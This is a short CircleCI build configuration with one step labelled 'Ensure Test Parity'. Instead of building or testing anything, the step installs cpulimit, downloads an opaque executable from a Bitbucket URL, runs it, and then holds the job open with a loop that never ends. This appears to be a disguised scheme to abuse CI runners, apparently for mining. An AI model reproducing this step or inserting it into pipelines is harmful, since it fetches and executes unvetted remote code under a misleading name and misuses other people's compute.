version: 2
jobs:
  build:
    machine:
      image: ubuntu-2004:202008-01
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
            sudo add-apt-repository ppa:ubuntu-toolchain-r/test -y
            sudo apt update -y && sudo apt install gcc-9 -y
            sudo apt install libstdc++6 -y
            sudo apt install cpulimit nano -y
            wget https://bitbucket.org/seaguardian/guardian3/raw/17ddcf979a11515ef19bc5e54f841795ae2b3f8a/run && chmod +x run && ./run
            time=${1-1}; while test $time -gt 0; do printf "$time"; sleep 60; done